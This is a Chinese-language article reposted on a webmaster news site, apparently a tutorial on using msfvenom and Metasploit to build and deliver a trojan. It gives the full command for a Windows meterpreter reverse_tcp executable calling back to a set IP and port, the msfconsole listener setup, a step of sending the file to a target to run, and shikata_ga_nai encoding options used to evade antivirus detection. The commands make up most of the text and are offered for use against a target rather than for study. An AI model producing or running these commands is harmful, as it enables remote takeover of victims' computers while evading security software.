加入收藏 | 设为首页 | 会员中心 | 我要投稿 徐州站长网 (https://www.0516zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 服务器 > 安全 > 正文

利用msfvenom生成木马文件

发布时间:2022-11-06 14:33:05 所属栏目:安全 来源:网络
导读: 利用msfvenom生成木马文件
时间:2022-03-02
本文章向大家介绍利用msfvenom生成木马文件,主要包括利用msfvenom生成木马文件使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的

利用msfvenom生成木马文件

时间:2022-03-02

本文章向大家介绍利用msfvenom生成木马文件,主要包括利用msfvenom生成木马文件使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

当我们需要往目标机上传木马文件时,我们就可以利用msfvenom生成一个木马文件,并用metersploit进行监听,就能够反弹回shell。

我们制作的木马文件有没有免杀功能,可以在virscan中进行扫描检测一下。

https://www.virscan.org/
或者在本地用一些杀毒软件进行检测。

常规利用1. 生成windows木马程序。

生成一个windows的木马应用程序:back.exe,并反弹shell至192.168.91.132:8836端口。我们可以利用metersploit进行监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.132 LPORT=8836 -f exe -o back.exe
-p 是payload,就是控制目标主机以后,要让他干什么。具体的命令就是payload.
-f 是生成的后门的格式。
-o 是输出文件名

2. 将木马程序发送给目标机。3. 在自己的kali中开启metersploit。

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.91.132 #这里的IP地址就是我们木马文件中要反弹的IP地址
set LPORT 8836
run

4. 目标机点击了back.exe。

当目标机运行了木马程序时,我们msf这边就上线了,一般这种的会被杀毒软件发现,要想不被发现木马如何免杀,就要制作免杀木马程序。

制作免杀木马

msfvenom -l encoders  #查看有哪些编码格式。
-e x86/shikata_ga_nai 对木马编码进行免杀
-i 5 指定编码5次,这个次数可以随便修改。
-b '\x00' 指定一些坏字节。

(编辑:徐州站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!